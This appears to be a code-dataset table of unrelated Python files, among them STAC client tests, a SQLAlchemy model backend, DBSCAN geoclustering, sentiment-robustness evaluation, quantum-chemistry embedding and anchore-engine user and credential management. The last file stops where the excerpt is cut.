text string | size int64 | token_count int64 |
|---|---|---|
import pytest
from pystac_client import CollectionClient
from pystac_client.client import Client
from .helpers import STAC_URLS
class TestCollectionClient:
    @pytest.mark.vcr
    def test_instance(self):
        """A collection fetched from the API is a CollectionClient with a readable repr."""
        api = Client.open(STAC_URLS['PLANETARY-COMPUTER'])
        collection = api.get_collection('aster-l1t')
        assert isinstance(collection, CollectionClient)
        assert str(collection) == '<CollectionClient id=aster-l1t>'

    @pytest.mark.vcr
    def test_get_items(self):
        """Every item yielded by the collection belongs to that collection."""
        api = Client.open(STAC_URLS['PLANETARY-COMPUTER'])
        collection = api.get_collection('aster-l1t')
        for item in collection.get_items():
            assert item.collection_id == collection.id
| 743 | 225 |
from __future__ import absolute_import
from frasco import copy_extra_feature_options, current_app
from frasco.utils import JSONEncoder, ContextStack, DelayedCallsContext
from frasco_models import Backend, ModelSchemaError, and_, split_field_operator, QueryError
from frasco_models.utils import clean_proxy
from flask_sqlalchemy import SQLAlchemy, Model as BaseModel
from sqlalchemy.ext.declarative import declarative_base
import sqlalchemy
from sqlalchemy.inspection import inspect as sqlainspect
from sqlalchemy.sql import sqltypes
import inspect
import datetime
from contextlib import contextmanager
import functools
class Model(BaseModel):
    """Base model adding frasco task-queue (de)serialization hooks."""

    def __taskdump__(self):
        # Serialize as (model lookup expression, primary key as string).
        ref = 'frasco::current_app.features.models[%s]' % self.__class__.__name__
        return ref, str(self.id)

    @classmethod
    def __taskload__(cls, id):
        # Restore the instance from its primary key.
        return cls.query.get(id)
# Ordered mapping of SQLAlchemy column types to their Python equivalents.
# Entries are checked with isinstance() in order (see
# SqlalchemyBackend.inspect_fields); anything unmatched falls back to str.
sqla_type_mapping = [
    (sqltypes.Integer, int),
    (sqltypes.Float, float),
    (sqltypes.Boolean, bool),
    (sqltypes.DateTime, datetime.datetime),
    (sqltypes.Date, datetime.date)
]
class SqlalchemyBackend(Backend):
    """frasco models backend backed by Flask-SQLAlchemy.

    Translates the generic frasco_models query/CRUD API into SQLAlchemy
    sessions and queries. NOTE: this module targets Python 2 (iteritems(),
    dict.items() indexing); keep that style when modifying it.
    """
    name = "sqlalchemy"

    def __init__(self, app, options):
        super(SqlalchemyBackend, self).__init__(app, options)
        copy_extra_feature_options(app.features.models, app.config, 'SQLALCHEMY_')
        self.db = SQLAlchemy(app, session_options=options.get('session_options'),
            model_class=Model)

        @app.cli.command()
        def create_db():
            # Create all tables; on a circular FK dependency, try to emit a
            # graph of the cycle to help debugging before re-raising.
            try:
                self.db.create_all()
            except sqlalchemy.exc.CircularDependencyError as e:
                try:
                    self.graph_circular_dependency_error(e)
                except ImportError:
                    app.logger.info('Install networkx and pygraphviz to generate a graph of the circular dependency')
                raise

        app.cli.command('drop_db')(self.db.drop_all)

        if app.features.exists('tasks'):
            from celery.signals import task_postrun

            def handle_celery_postrun(retval=None, *args, **kwargs):
                # Commit (unless the task failed) and clean up the session
                # after each celery task, mirroring request teardown.
                if app.config.get('SQLALCHEMY_COMMIT_ON_TEARDOWN'):
                    if not isinstance(retval, Exception):
                        self.db.session.commit()
                if not app.config.get('CELERY_ALWAYS_EAGER'):
                    self.db.session.remove()
            task_postrun.connect(handle_celery_postrun, weak=False)

    def ensure_model(self, name):
        """Return the model class for *name*; model instances pass through."""
        if isinstance(name, self.db.Model):
            return name
        return self.db.Model._decl_class_registry[name]

    def ensure_schema(self, name, fields):
        """Raise ModelSchemaError if any of *fields* is missing on the model."""
        model = self.ensure_model(name)
        for fname, _ in fields.iteritems():
            if fname not in model.__mapper__.attrs:
                raise ModelSchemaError("Missing field '%s' in model '%s'" % (fname, name))

    def inspect_fields(self, model):
        """Return [(column_name, {'type': python_type}), ...] for *model*."""
        if not inspect.isclass(model):
            model = model.__class__
        mapper = sqlainspect(model)
        fields = []
        for attr in mapper.column_attrs:
            field_type = str  # default when no mapping entry matches
            for coltype, pytype in sqla_type_mapping:
                if isinstance(attr.columns[0].type, coltype):
                    field_type = pytype
                    break
            fields.append((attr.key, dict(type=field_type)))
        return fields

    def begin_transaction(self):
        self.db.session.begin(subtransactions=True)

    def flush_transaction(self):
        # BUGFIX: previously called session.fush(), which raised
        # AttributeError; the method name itself was also misspelled.
        self.db.session.flush()

    # Backward-compatible alias for the historical misspelled method name.
    flusb_transaction = flush_transaction

    def commit_transaction(self):
        self.db.session.commit()

    def rollback_transaction(self):
        self.db.session.rollback()

    def add(self, obj):
        self.db.session.add(obj)

    def remove(self, obj):
        self.db.session.delete(obj)

    def find_by_id(self, model, id):
        return model.query.filter_by(id=id).first()

    def find_all(self, query):
        return self._transform_query(query).all()

    def find_first(self, query):
        return self._transform_query(query).first()

    def find_one(self, query):
        return self._transform_query(query).first()

    def count(self, query):
        return self._transform_query(query).count()

    def update(self, query, data):
        # synchronize_session=False: bulk UPDATE without reconciling the
        # in-memory session state.
        return self._transform_query(query).update(
            self._prepare_data(query.model, data),
            synchronize_session=False)

    def delete(self, query):
        return self._transform_query(query).delete(
            synchronize_session=False)

    def _transform_query(self, q):
        """Convert a frasco_models query object into an SQLAlchemy query."""
        qs = q.model.query
        if q._filters:
            qs = qs.filter(self._transform_query_filter_group(q.model, and_(*q._filters)))
        if q._order_by:
            qs = qs.order_by(*[k + ' ' + v for k, v in q._order_by])
        if q._offset:
            qs = qs.offset(q._offset)
        if q._limit:
            qs = qs.limit(q._limit)
        return qs

    def _transform_query_filter_group(self, model, group):
        """Translate a {"$and"/"$or": [...]} filter group recursively."""
        operator, filters = group.items()[0]
        transformed_filters = []
        for filter in filters:
            if isinstance(filter, dict):
                q = self._transform_query_filter_group(model, filter)
                if q is None:
                    continue
            else:
                q = self._transform_query_filter(model, filter)
            transformed_filters.append(q)
        if operator == "$or":
            return sqlalchemy.or_(*transformed_filters)
        return sqlalchemy.and_(*transformed_filters)

    def _transform_query_filter(self, model, filter):
        """Translate a single (field__op, value) filter into a SQLA clause."""
        field, value = filter
        field, operator, py_operator = split_field_operator(field, with_python_operator=True)
        value = clean_proxy(value)
        column = getattr(model, field)
        if py_operator:
            return py_operator(column, value)
        if operator == 'in':
            return column.in_(value)
        if operator == 'nin':
            return ~column.in_(value)
        raise QueryError("Cannot convert operator '%s' to sqlalchemy operator" % operator)

    def _prepare_data(self, model, data):
        """Build the column->value mapping for a bulk update, handling the
        'incr' operator; 'push' is list-specific and unsupported here."""
        out = {}
        for field, value in data.iteritems():
            field, operator = split_field_operator(field)
            column = getattr(model, field)
            if operator == 'incr':
                out[column] = column + value
            elif operator == 'push':
                raise QueryError("Operator 'push' not supported by sqlalchemy")
            else:
                out[column] = value
        return out

    def graph_circular_dependency_error(self, e, filename='sqla_circular_dep_graph.png'):
        """Render the tables involved in a CircularDependencyError as a PNG.

        Requires networkx and pygraphviz (ImportError propagates otherwise).
        """
        # from: http://ilyasterin.com/blog/2014/01/cyclical-dependency-detection-in-the-database.html
        import networkx as nx
        G = nx.DiGraph()
        cycle_tables = set([t.name for t in e.cycles])
        for t in e.cycles:
            for fk in t.foreign_keys:
                table, col = fk.target_fullname.split('.')
                if (table in cycle_tables):
                    G.add_edge(t.name, table)
        agraph = nx.to_agraph(G)
        agraph.draw(filename, format='png', prog='dot')
| 7,135 | 2,102 |
from pessoa import Pessoa
# Manual smoke tests for the Pessoa (person) eating/talking state machine.
p1 = Pessoa('Luiz', 29)
p2 = Pessoa('Joana', 59)
# Test: already eating
# p1.comer('maçã')
# p1.comer('maçã')
# Test: not eating (stop eating without having started)
# p1.para_comer()
# Test: already talking
# p1.falar('Política')
# p1.falar('Política')
# Test: cannot talk while eating
# p1.comer('maçã')
# p1.falar('Política')
# Test: not talking (stop talking without having started)
# p1.parar_falar()
# Test: cannot eat while talking
# p1.falar('Estudo')
# p1.comer('Maçã')
p1.comer('ovo')
p1.para_comer()
p1.falar('COmida')
p1.parar_falar() | 538 | 257 |
#<!--------------------------------------------------------------------------->
#<!-- ITU - IT University of Copenhagen -->
#<!-- SSS - Software and Systems Section -->
#<!--------------------------------------------------------------------------->
#<!-- ITU - IT University of Copenhagen -->
#<!-- SSS - Software and Systems Section -->
#<!-- SIGB - Introduction to Graphics and Image Analysis -->
#<!-- File : Enumerations.py -->
#<!-- Description: Class used for managing the cameras enumerations -->
#<!-- Author : Fabricio Batista Narcizo -->
#<!-- : Rued Langgaards Vej 7 - 4D06 - DK-2300 - Copenhagen S -->
#<!-- : fabn[at]itu[dot]dk -->
#<!-- Responsable: Dan Witzner Hansen (witzner[at]itu[dot]dk) -->
#<!-- Fabricio Batista Narcizo (fabn[at]itu[dot]dk) -->
#<!-- Information: No additional information -->
#<!-- Date : 24/02/2016 -->
#<!-- Change : 24/02/2016 - Creation of this class -->
#<!-- Review : 24/02/2016 - Finalized -->
#<!--------------------------------------------------------------------------->
__version__ = "$Revision: 2016022401 $"
########################################################################
"""Enumerations used for selecting the input cameras used by SIGB Framework."""
# Camera identifiers encode the capture resolution (width x height) and,
# optionally, a fixed frame rate; the string values double as readable names.
CAMERA_VIDEOCAPTURE_320X240 = "CAMERA_VIDEOCAPTURE_320X240"
CAMERA_VIDEOCAPTURE_320X240_15FPS = "CAMERA_VIDEOCAPTURE_320X240_15FPS"
CAMERA_VIDEOCAPTURE_320X240_30FPS = "CAMERA_VIDEOCAPTURE_320X240_30FPS"
CAMERA_VIDEOCAPTURE_640X480 = "CAMERA_VIDEOCAPTURE_640X480"
CAMERA_VIDEOCAPTURE_640X480_15FPS = "CAMERA_VIDEOCAPTURE_640X480_15FPS"
CAMERA_VIDEOCAPTURE_640X480_30FPS = "CAMERA_VIDEOCAPTURE_640X480_30FPS"
| 2,135 | 695 |
import json
import nlpaug.augmenter.char as nac
import pandas as pd
from transformers import AutoModelForSequenceClassification, AutoTokenizer, pipeline
from transformers.tokenization_utils import PreTrainedTokenizer
from config import Config
# Pretrained SST-2 sentiment model used for the robustness evaluation below.
transformer_model = "distilbert-base-uncased-finetuned-sst-2-english"
# load model
tokenizer = AutoTokenizer.from_pretrained(transformer_model)
inference_model = AutoModelForSequenceClassification.from_pretrained(transformer_model)
model = pipeline("sentiment-analysis", model=inference_model, tokenizer=tokenizer)
# define text perturbation: keyboard-typo augmenter limited to one word
keyboard_aug = nac.KeyboardAug(aug_word_max=1)
def typo(aug, input):
    """Apply the given character-level augmenter to *input* and return the result."""
    return aug.augment(input)
def eval_perturb(input_a, input_b):
    """Score both texts with the sentiment model.

    Returns (squared score difference, whether the predicted labels agree,
    score of the perturbed input).
    """
    result_a, result_b = model([input_a, input_b])
    score_gap = result_a["score"] - result_b["score"]
    labels_match = result_a["label"] == result_b["label"]
    return score_gap ** 2, labels_match, result_b["score"]
# Read in our test dataset (tab-separated sentences; trailing field is empty).
# BUGFIX: the file handle was previously opened without being closed.
with open(Config.TEST_SET) as f:
    test_dataset = f.read().split("\t")[:-1]
# Loop over all test examples and evaluate the model on each perturbed pair.
mse, total_acc = 0, 0
n = len(test_dataset)
interesting_cases = []
for sentence in test_dataset:
    sentence_mod = typo(keyboard_aug, sentence)
    sq_error, acc, perturb_score = eval_perturb(sentence, sentence_mod)
    mse += (1 / n) * sq_error
    total_acc += (1 / n) * acc
    if not acc:
        # Keep label-flipping perturbations for manual inspection.
        interesting_cases.append((sentence, sentence_mod, perturb_score))
# Most confident wrong predictions first.
interesting_cases.sort(key=lambda tup: tup[2], reverse=True)
# Write out our favorite interesting cases as a markdown table.
to_report = interesting_cases[:5]
df = pd.DataFrame(to_report, columns=["Original", "Perturbed", "Model confidence"])
with open(Config.TOP_PERTURBATIONS, "w") as outfile:
    outfile.write(df.to_markdown(index=False))
# Write aggregate results to file.
with open(Config.TEST_SCORES, "w") as outfile:
    json.dump({"accuracy": total_acc, "mse": mse}, outfile)
| 2,022 | 684 |
from functools import reduce
import numpy as np
import matplotlib.pyplot as plt
from dateutil import parser
import glob
import os
import csv
import json
def loadData(path, subset = -1, loadDebug = False):
    """Load all data_*.csv files under *path*.

    Each CSV becomes one flat list of floats (all rows concatenated). When
    loadDebug is set, the matching debug_<n>.csv JSON file is parsed too.

    :param path: directory containing the data_*.csv files
    :param subset: if > 0, only load the first *subset* files
    :param loadDebug: also load the paired debug_<n>.csv JSON files
    :return: (2-D numpy array, one row per file; list of debug dicts)
    """
    allFiles = glob.glob(os.path.join(path, "data_*.csv"))
    if subset > 0:
        allFiles = allFiles[0:subset]
    data = []
    debug = []
    for file in allFiles:
        print(file)
        # BUGFIX: use basename instead of split('/') so this also works with
        # Windows path separators.
        fileNum = os.path.basename(file).replace("data_", "").replace(".csv", "")
        with open(file, 'r') as f:
            data.append([float(val) for sublist in list(csv.reader(f)) for val in sublist])
        if loadDebug:
            with open(file.replace("data_" + fileNum + ".csv", "debug_" + fileNum + ".csv")) as f:
                debug.append(json.load(f))
    return (np.array(data), debug)
def calculateEma(price, interval = 9, startEma = -1):
    """Exponential moving average of *price*.

    https://www.investopedia.com/ask/answers/122314/what-exponential-moving-average-ema-formula-and-how-ema-calculated.asp
    Recurrence: ema = (close - prev_ema) * k + prev_ema with k = 2/(interval+1).

    When startEma > 0 it seeds the series directly; otherwise the SMA of the
    first *interval* prices seeds it and the EMA proper starts after that
    window (the seed is repeated *interval* times to keep lengths aligned).
    """
    k = 2 / (interval + 1)
    step = lambda acc, close: acc + [(close - acc[-1]) * k + acc[-1]]
    if startEma > 0:
        return reduce(step, price, [startEma])
    window = price[0:interval]
    sma = sum(window) / len(window)
    return reduce(step, price[interval:], [sma] * interval)
def rewindEma(price, interval, startEma):
    """Run the EMA recurrence backwards: starting from *startEma*, recover the
    preceding EMA values given the (reversed) price series."""
    k = 2 / (interval + 1)
    out = [startEma]
    for close in price:
        out.append((-close * k + out[-1]) / (-k + 1))
    return out
def priceChangeToPrice(data, initial = 100):
    """Turn fractional price changes into an absolute price series starting at
    *initial* (which is included as the first element)."""
    prices = [initial]
    for change in data:
        prices.append(prices[-1] + prices[-1] * change)
    return prices
def rewindPriceChangeToPrice(data, initial = 100):
    """Inverse of priceChangeToPrice: walk the (reversed) changes, dividing out
    each fractional change, starting from *initial*."""
    prices = [initial]
    for change in data:
        prices.append(prices[-1] / (change + 1.0))
    return prices
def debugPlot(data, debug, timeDomains = [1,5,15,30]):
    """Reconstruct and plot price and EMA series around a trigger event.

    NOTE(review): *data* is assumed to hold interleaved series in 180-sample
    windows, one window per entry of timeDomains, with price at alternating
    indices — the slicing below depends on that layout; confirm against the
    data producer. *debug* is the JSON structure loaded by loadData.
    """
    # First window (181 samples, price at odd indices) is the 1-minute domain.
    sample1Min = data[0:181]
    sample1Min = sample1Min[1::2]  # only want price
    trigger = debug["Trigger"]["parent"][0]
    trainingExampleId = debug["TrainingExample"]["id"]
    symbol = debug["TrainingExample"]["symbol"]["sym"]
    triggerData = [val for sublist in trigger["event"]["data"] for val in sublist]
    # Pull the price and the 15/65-period EMA snapshots out of the event data.
    priceData = list(filter(lambda x: x["$type"] == "m.q.PriceTs", triggerData ))
    ema15Data = list(filter(lambda x: x["$type"] == "m.q.EmaTs" and x["data"]["timePeriod"] == 15, triggerData ))
    ema65Data = list(filter(lambda x: x["$type"] == "m.q.EmaTs" and x["data"]["timePeriod"] == 65, triggerData ))
    # we need to rewind these values through time now.
    rewindPrice1 = rewindPriceChangeToPrice(sample1Min[::-1], initial=priceData[0]["data"]["close"])
    rewindEma15 = rewindEma(rewindPrice1, 15, startEma = ema15Data[0]["data"]["ema"])
    rewindEma65 = rewindEma(rewindPrice1, 65, startEma = ema65Data[0]["data"]["ema"])
    enterPrice = priceData[0]["data"]["close"]
    print("symbol: "+symbol)
    print("Training Example: " + trainingExampleId)
    print("enter price: " + str(enterPrice))
    print("enter time: " + priceData[0]["time"])
    time = parser.parse(priceData[0]["time"])
    print(time.minute)
    # Rebuild the forward-looking series from the rewound starting price.
    graph1 = priceChangeToPrice(sample1Min, initial=rewindPrice1[-1])
    ema15 = calculateEma(graph1, 15, startEma=graph1[0])
    ema65 = calculateEma(graph1, 65, startEma=graph1[0])
    series = [graph1, ema65, ema15]
    ind = 1
    for t in filter(lambda x: x != 1,timeDomains):
        # Each additional time domain occupies the next 180-sample window.
        start = (ind*180)+1
        end = ((ind+1)*180)+1
        sampleXMin = data[start:end]
        sampleXMin = sampleXMin[::2]
        # Offset of the t-minute bar boundary relative to the 1-minute clock.
        remainder = (60+time.minute) % t
        rewindPriceX = rewindPriceChangeToPrice(sampleXMin[::-1], initial=graph1[-(remainder+1)])
        # Pad the existing series so all plots share a common x axis.
        extra = 90*t - 90*timeDomains[ind-1]
        series = [([None] * extra) + x for x in series]
        graphX = priceChangeToPrice(sampleXMin, initial=rewindPriceX[-1])
        # Stretch each coarse sample across t one-minute slots, then align.
        graphX = [[x]*t for x in graphX]
        graphX = [val for sublist in graphX for val in sublist][remainder:]
        series.append(graphX)
        ind = ind+1
    for x in series:
        plt.plot(x)
    plt.show()
| 4,534 | 1,700 |
# -*- coding: utf-8 -*-
# @Date : 2017-07-18 20:12:08
# @Author :
| 71 | 47 |
# --------------------------------
# Name: GeoDBSCAN.py
# Purpose: This script is intended to allow ArcGIS users that have Scikit Learn installed in their python installation
# utilize DBSCAN to create clusters of geographic features based on their centroids.
# Current Owner: David Wasserman
# Last Modified: 4/5/2020
# Copyright: (c) David Wasserman
# ArcGIS Version: ArcGIS Pro
# Python Version: 3.6
# --------------------------------
# Copyright 2016 David J. Wasserman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------
# Import Modules
import os, arcpy
import numpy as np
import pandas as pd
import glearnlib as gl
# Import scikit-learn; surface a helpful ArcGIS error when it is missing.
try:
    from sklearn import cluster
    from sklearn import metrics
    from sklearn.preprocessing import StandardScaler
except ImportError:
    # BUGFIX: a bare except also swallowed unrelated errors (e.g. KeyboardInterrupt).
    arcpy.AddError("This library requires Sci-kit Learn installed in the ArcGIS Python Install."
                   " Might require installing pre-requisite libraries and software.")
# Function Definitions
def classify_features_dbscan(in_fc, neighborhood_size, minimum_samples, weight_field):
    """Take in a feature class of points and classify them into clusters using DBSCAN from Scikit learn.
    Append field labels to the input feature class using Extend Numpy Array function.

    :param in_fc: input point feature class
    :param neighborhood_size: DBSCAN eps (max neighbor distance), in dataset units
    :param minimum_samples: DBSCAN min_samples (density threshold)
    :param weight_field: optional field used as sample weight; ignored if absent
    """
    try:
        # Declare Starting Variables
        desc = arcpy.Describe(in_fc)
        OIDFieldName = desc.OIDFieldName
        workspace = os.path.dirname(desc.catalogPath)
        gl.arc_print("Converting '{0}' feature class geometry to X-Y centroid numpy arrays.".format(str(desc.name)))
        centroid_x, centroid_y = 'SHAPE@X', 'SHAPE@Y'
        objectid = 'OID@'
        fields = [centroid_x, centroid_y, objectid]
        use_weight = False
        if gl.field_exist(in_fc, weight_field):
            fields.append(weight_field)
            use_weight = True
        # Convert Feature Class to NP array
        geoarray = arcpy.da.FeatureClassToNumPyArray(in_fc, fields,
                                                     null_value=1)  # Null values are treated as one feature-weight
        cluster_fields = [centroid_x, centroid_y]
        data = pd.DataFrame(geoarray)
        coordinates_cluster = data[cluster_fields]
        if use_weight:
            gl.arc_print("Using weight field {0} and geographic coordinates for clustering with DBSCAN.".format(
                str(weight_field)), True)
            weight = np.asarray(data[weight_field], dtype=np.float64)
            # BUGFIX: weights were previously passed positionally as fit()'s
            # second argument (y), which DBSCAN ignores; pass sample_weight
            # explicitly so weighting actually takes effect. Keyword arguments
            # to the constructor keep this compatible with modern scikit-learn.
            dbscan_classification = cluster.DBSCAN(eps=neighborhood_size, min_samples=minimum_samples).fit(
                coordinates_cluster, sample_weight=weight)
        else:
            gl.arc_print("Using geographic coordinates to classify with DBSCAN.", True)
            dbscan_classification = cluster.DBSCAN(eps=neighborhood_size, min_samples=minimum_samples).fit(
                coordinates_cluster)
        core_samples_mask = np.zeros_like(dbscan_classification.labels_, dtype=bool)
        core_samples_mask[dbscan_classification.core_sample_indices_] = True
        labels = dbscan_classification.labels_
        # Number of clusters in labels, ignoring noise if present.
        cluster_count = len(set([i for i in labels if i != -1]))
        gl.arc_print('Estimated number of clusters: {0}'.format(cluster_count), True)
        try:
            gl.arc_print("Silhouette Coefficient: {0}.".format(metrics.silhouette_score(coordinates_cluster, labels)),
                         True)
            gl.arc_print(
                """Wikipedia: The silhouette value is a measure of how similar an object is to its own cluster (cohesion) compared to other clusters (separation). The silhouette ranges from -1 to 1, where a high value indicate that the object is well matched to its own cluster and poorly matched to neighboring clusters.""")
        except Exception as e:
            gl.arc_print("Could not compute Silhouette Coefficient. Error: {0}".format(str(e.args[0])), True)
        gl.arc_print("Appending Labels from DBSCAN to new numpy array.", True)
        JoinField = str(arcpy.ValidateFieldName("NPIndexJoin", workspace))
        LabelField = str(arcpy.ValidateFieldName("DBSCANLabel", workspace))
        finalDBSCANArray = np.array(list(zip(data[objectid], labels)),
                                    dtype=[(JoinField, np.int32), (LabelField, np.int32)])
        gl.arc_print("Extending Label Fields to Output Feature Class. Clusters labels start at 0, noise is labeled -1.",
                     True)
        arcpy.da.ExtendTable(in_fc, OIDFieldName, finalDBSCANArray, JoinField, append_only=False)
        del geoarray, finalDBSCANArray, labels, dbscan_classification, core_samples_mask
        gl.arc_print("Script Completed Successfully.", True)
    except arcpy.ExecuteError:
        gl.arc_print(arcpy.GetMessages(2))
    except Exception as e:
        print(str(e.args[0]))
        arcpy.AddError(str(e.args[0]))
# End do_analysis function
# This test allows the script to be used from the operating
# system command prompt (stand-alone), in a Python IDE,
# as a geoprocessing script tool, or as a module imported in
# another script
if __name__ == '__main__':
    # Define input parameters (supplied by the ArcGIS geoprocessing tool UI).
    input_feature_class = arcpy.GetParameterAsText(0)
    neighborhood_size = arcpy.GetParameter(1)   # DBSCAN eps, in dataset units
    minimum_samples = arcpy.GetParameter(2)     # DBSCAN min_samples
    weight_field = arcpy.GetParameterAsText(3)  # optional weight field name
    classify_features_dbscan(input_feature_class, neighborhood_size, minimum_samples, weight_field)
| 5,913 | 1,692 |
#this implementation mainly work on grey scale image
import argparse
import shutil
from pathlib import Path
import natsort
from qatm_pytorch_v3 import CreateModel, ImageDataset,ImageDataset_2, plot_result_mayank, nms, run_one_sample_mayank
from torchvision import models
import torch
from utils import *
from imageloader_mayank import TripletImageLoader,TinyImageNetLoader,find_correct_template_output
# +
# import functions and classes from qatm_pytorch.py
print("import qatm_pytorch.py...")
import time
from data_preprocess_for_inference import find_template
if __name__ == '__main__':
    batch_size_train=7
    batch_size_test=7
    #deep ranking starts here
    root=''
    # trainloader, testloader = TinyImageNetLoader(args.dataroot, args.batch_size_train, args.batch_size_test)
    # Build the triplet train/test loaders; the train set also exposes the
    # list of candidate template image names.
    trainset = TripletImageLoader(base_path=root)
    trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size_train, num_workers=4)
    image_list_sample=trainset.image_name_sample
    testset = TripletImageLoader(base_path=root, train=False)
    testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size_test, num_workers=4)
    # Select the best-matching template index via the deep-ranking model.
    image_index=find_correct_template_output(trainloader, testloader, "is_gpu")
    final_image=image_list_sample[image_index]
    print (image_list_sample)
    # Display the selected template for two seconds (press 'q' to close early).
    save_frame_path = "../data/image_save/" + final_image
    max_score_img=cv2.imread(save_frame_path)
    cv2.imshow('final selection', max_score_img)
    ch = cv2.waitKey(2000)
    if ch & 0XFF == ord('q'):
        cv2.destroyAllWindows()
        # cv2.waitKey(1)
    cv2.destroyAllWindows()
| 1,607 | 555 |
from pydmfet import proj_ao, tools
from pydmfet.qcwrap.pyscf_rks_ao import rks_ao
from pyscf import gto,scf
import numpy as np
from pyscf.tools import molden
# Projection-based DFT embedding run for the O2-C24 system.
t0 = tools.time0()
bas ='6-31G*'
# Smearing width passed to rks_ao as smear_sigma (fractional occupations).
temp = 0.005
mol = gto.Mole()
mol.atom = open('O2-C24.xyz').read()
mol.basis = bas
mol.charge = 0
mol.build(max_memory = 24000, verbose=4)
dm_guess=None
# Initial density matrix built from previously converged PBE orbitals.
_, _, mo_coeff, mo_occ, _, _ = molden.load("MO_pbe.molden")
dm_guess = np.dot(mo_coeff*mo_occ, mo_coeff.T)
#mf = scf.UKS(mol)
mf = rks_ao(mol,smear_sigma = temp)
mf.xc = "pbe,pbe"
mf.max_cycle = 50
mf.scf(dm0=dm_guess)
'''
with open( 'MO.molden', 'w' ) as thefile:
    molden.header(mf.mol, thefile)
    molden.orbital_coeff(mf.mol, thefile, mf.mo_coeff,occ = mf.mo_occ, ene = mf.mo_energy)
'''
# Mark the first eight atoms as the embedded (impurity) region.
natoms = mol.natm
impAtom = np.zeros([natoms], dtype=int)
for i in range(8):
    impAtom[i] = 1
# Projection-based embedding with 110 electrons assigned to the environment.
embed = proj_ao.proj_embed(mf,impAtom, Ne_env = 110)
embed.pop_method = 'meta_lowdin'
embed.pm_exponent = 2
embed.make_frozen_orbs(norb = 83)
embed.embedding_potential()
| 1,017 | 520 |
"""
Interface to the account_users table. Data format is dicts, not objects.
"""
from passlib import pwd
from passlib.context import CryptContext
from anchore_engine.db import AccountUser, AccessCredential, UserAccessCredentialTypes
from anchore_engine.db.entities.common import anchore_now
from anchore_engine.configuration import localconfig
from anchore_engine.subsys import logger
class UserNotFoundError(Exception):
    """Raised when a username has no matching AccountUser record."""

    def __init__(self, username):
        message = 'User not found. Username={}'.format(username)
        super(UserNotFoundError, self).__init__(message)
        self.username = username
class UserAlreadyExistsError(Exception):
    """Raised when creating a user whose username is already taken."""

    def __init__(self, account_name, username):
        message = 'User already exists. account={} username={}'.format(account_name, username)
        super(UserAlreadyExistsError, self).__init__(message)
        self.account_name = account_name
        self.username = username
class CredentialAlreadyExistsError(Exception):
    """Raised when adding a credential of a type the user already has.

    BUGFIX: the message previously read 'User already exists' (copy-paste from
    UserAlreadyExistsError) and misspelled 'cred_typ'; it now describes the
    actual condition.
    """

    def __init__(self, account_name, username, cred_type):
        super(CredentialAlreadyExistsError, self).__init__(
            'Credential already exists. account={} username={} cred_type={}'.format(account_name, username, cred_type))
        self.account_name = account_name
        self.username = username
        self.credential_type = cred_type
def _generate_password():
    """
    Return a randomly generated password string.

    Uses passlib's word generator with 48 bits of entropy; the resulting
    length is chosen by passlib based on its default charset.
    :return: str
    """
    return pwd.genword(entropy=48)
# Process-wide PasswordHasher singleton, created lazily by get_hasher().
_hasher = None


class PasswordHasher(object):
    """Hashes passwords for storage when hashed_passwords is enabled in config."""

    def __init__(self, config):
        auth_config = config.get('user_authentication', {})
        self.do_hash = auth_config.get('hashed_passwords', False)

    def hash(self, password):
        """
        Hash the password to store it. If not configured for hashes, this is a no-op.
        :param password:
        :return:
        """
        logger.info('Checking hash on password')
        if not self.do_hash:
            logger.info('No hash requirement set in config')
            return password
        logger.info('Hashing password prior to storage')
        crypt_ctx = CryptContext(schemes=['argon2'])
        return crypt_ctx.hash(password)
def get_hasher(config=None):
    """Return the process-wide PasswordHasher, creating it lazily.

    Uses *config* when given on first call, otherwise the local config.
    """
    global _hasher
    if _hasher is None:
        effective = config if config is not None else localconfig.get_config()
        _hasher = PasswordHasher(effective)
    return _hasher
def add(account_name, username, user_type, user_source, session):
    """
    Create a new user, raising error on conflict

    :param account_name: str name of the account the user belongs to
    :param username: str unique username for the new user
    :param user_type: type of the user record
    :param user_source: origin/source of the user record
    :param session: db session
    :return: dict representation of the created user
    """
    user_to_create = session.query(AccountUser).filter_by(username=username).one_or_none()
    if user_to_create is None:
        user_to_create = AccountUser()
        user_to_create.account_name = account_name
        user_to_create.username = username
        user_to_create.created_at = anchore_now()
        user_to_create.type = user_type
        user_to_create.source = user_source
        user_to_create.last_updated = anchore_now()
        session.add(user_to_create)
        session.flush()  # populate generated fields before serializing
    else:
        raise UserAlreadyExistsError(account_name, username)
    return user_to_create.to_dict()
def add_user_credential(username, credential_type=UserAccessCredentialTypes.password, value=None, overrwrite=True, session=None):
    """
    Add a credential of *credential_type* to an existing user.

    When *value* is None a random password is generated. When *overrwrite*
    (sic; parameter name kept for backward compatibility) is set, existing
    credentials of the same type are replaced; otherwise
    CredentialAlreadyExistsError is raised.

    :raises UserNotFoundError: when no user record matches *username*
    :return: dict representation of the new credential
    """
    usr = session.query(AccountUser).filter_by(username=username).one_or_none()
    if not usr:
        raise UserNotFoundError(username)

    matching = [obj for obj in filter(lambda x: x.type == credential_type, usr.credentials)]
    if overrwrite:
        for existing in matching:
            session.delete(existing)
    elif matching:
        # BUGFIX: usr is an AccountUser object, not a dict; usr['account_name']
        # raised TypeError instead of the intended error.
        raise CredentialAlreadyExistsError(usr.account_name, username, credential_type)

    credential = AccessCredential()
    credential.user = usr
    credential.username = usr.username
    credential.type = credential_type
    credential.created_at = anchore_now()

    if value is None:
        value = _generate_password()

    credential.value = get_hasher().hash(value)  # This is a no-op if hashing is not configured
    session.add(credential)
    return credential.to_dict()
def delete_user_credential(username, credential_type, session):
    """Delete the user's credential of the given type, if present.

    NOTE(review): returns True whether or not a credential was found —
    callers cannot distinguish "deleted" from "nothing to delete"; confirm
    this is intentional before changing it.
    """
    cred = session.query(AccessCredential).filter_by(username=username, type=credential_type).one_or_none()
    if cred:
        session.delete(cred)
    return True
def get_all(session):
    """Return every account user as a dict."""
    return [user.to_dict() for user in session.query(AccountUser)]
def get(username, session=None):
    """Return the user dict for *username*, or None when no record exists."""
    usr = session.query(AccountUser).filter_by(username=username).one_or_none()
    return usr.to_dict() if usr else None
def get_by_uuid(uuid, session=None):
